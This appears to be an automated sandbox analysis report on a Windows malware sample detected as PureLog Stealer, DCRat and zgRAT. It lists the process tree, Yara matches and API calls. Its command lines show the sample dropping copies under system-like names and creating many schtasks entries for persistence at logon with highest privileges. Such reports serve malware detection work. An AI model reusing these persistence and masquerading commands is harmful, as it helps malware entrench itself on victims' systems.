Apr 26, 2024 05:18:59.573710918 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 03:18:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Language: en CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFLRbuteLRdnhvDtxHvPmFdT2HlqL9bkhBbAxD8NIl7TCzVtmxSYxb97HQcpj9QtyEFWqTH7O%2FkYjPn3aA90PYT1XwkTQJkabEwuvrX6PbluBxeCfGZMvKt%2BNrDs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a36dbb1d08a533-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css">.../--><![CDATA[/>.../ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/...*/--></style></head><body><h1>Object not found!</h1><p> The request
Apr 26, 2024 05:18:59.573862076 CEST	557	IN	Data Raw: 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 Data Ascii: ed URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="/cdn-cgi/l/email-protection#
Apr 26, 2024 05:18:59.573873997 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:16:53
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\yX8787W7de.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yX8787W7de.exe"
Imagebase:	0x120000
File size:	2'010'836 bytes
MD5 hash:	10F54A1A68BCE057DC9ABBC2851A6235
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1640565455.0000000006B27000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1639922058.0000000006213000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1641053706.0000000006B25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:16:53
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\fontrefcrt\JfSdr.vbe"
Imagebase:	0x420000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:17:14
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\fontrefcrt\YPm3Ri0zuGSw0d5cA9MOsCVgRsbtCEjXWkwqUVDQU6Ex.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:17:14
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:17:14
Start date:	26/04/2024
Path:	C:\fontrefcrt\MsintoRefcommonsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\fontrefcrt/MsintoRefcommonsvc.exe"
Imagebase:	0x9b0000
File size:	1'689'088 bytes
MD5 hash:	65F6B916C8BD52DDAD601807F96BC373
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1847919566.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1889075277.00000000130A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontrefcrt\MsintoRefcommonsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontrefcrt\MsintoRefcommonsvc.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs Detection: 74%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:17:16
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SystemSettings.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:17:16
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:17:16
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 14 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
Imagebase:	0x7ff70f330000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:17:16
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"
Imagebase:	0x7ff6918d0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:17:16
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:17:16
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FAE.tmp" "c:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP"
Imagebase:	0x7ff7178f0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:17:16
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsY" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f
Imagebase:	0x7ff72bec0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 10 /tr "'C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsY" /sc ONLOGON /tr "'C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MsintoRefcommonsvcM" /sc MINUTE /mo 11 /tr "'C:\fontrefcrt\MsintoRefcommonsvc.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MsintoRefcommonsvc" /sc ONLOGON /tr "'C:\fontrefcrt\MsintoRefcommonsvc.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MsintoRefcommonsvcM" /sc MINUTE /mo 14 /tr "'C:\fontrefcrt\MsintoRefcommonsvc.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wNNbKC3aho.bat"
Imagebase:	0x7ff66b890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:17:17
Start date:	26/04/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7cbad0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:17:18
Start date:	26/04/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7e4a60000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	05:17:18
Start date:	26/04/2024
Path:	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"
Imagebase:	0xf10000
File size:	1'689'088 bytes
MD5 hash:	65F6B916C8BD52DDAD601807F96BC373
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs Detection: 74%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	05:17:18
Start date:	26/04/2024
Path:	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe"
Imagebase:	0x490000
File size:	1'689'088 bytes
MD5 hash:	65F6B916C8BD52DDAD601807F96BC373
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	05:17:18
Start date:	26/04/2024
Path:	C:\fontrefcrt\MsintoRefcommonsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\fontrefcrt\MsintoRefcommonsvc.exe
Imagebase:	0xb40000
File size:	1'689'088 bytes
MD5 hash:	65F6B916C8BD52DDAD601807F96BC373
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:17:18
Start date:	26/04/2024
Path:	C:\fontrefcrt\MsintoRefcommonsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\fontrefcrt\MsintoRefcommonsvc.exe
Imagebase:	0xa80000
File size:	1'689'088 bytes
MD5 hash:	65F6B916C8BD52DDAD601807F96BC373
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	05:17:18
Start date:	26/04/2024
Path:	C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe
Imagebase:	0x7a0000
File size:	1'689'088 bytes
MD5 hash:	65F6B916C8BD52DDAD601807F96BC373
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 83%, ReversingLabs Detection: 74%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:17:18
Start date:	26/04/2024
Path:	C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe
Imagebase:	0xa70000
File size:	1'689'088 bytes
MD5 hash:	65F6B916C8BD52DDAD601807F96BC373
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	05:17:19
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	05:17:26
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
Imagebase:	0x7ff66b890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	05:17:26
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	05:17:27
Start date:	26/04/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7cbad0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	05:17:27
Start date:	26/04/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff78d850000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	05:18:15
Start date:	26/04/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	87
Start time:	05:18:22
Start date:	26/04/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1522
Total number of Limit Nodes:	50

Executed Functions

Function 0013DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00130863: GetModuleHandleW.KERNEL32(kernel32), ref: 0013087C
Part of subcall function 00130863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0013088E
Part of subcall function 00130863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001308BF

Part of subcall function 0013A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0013A655

Part of subcall function 0013AC16: OleInitialize.OLE32(00000000), ref: 0013AC2F
Part of subcall function 0013AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0013AC66
Part of subcall function 0013AC16: SHGetMalloc.SHELL32(00168438), ref: 0013AC70

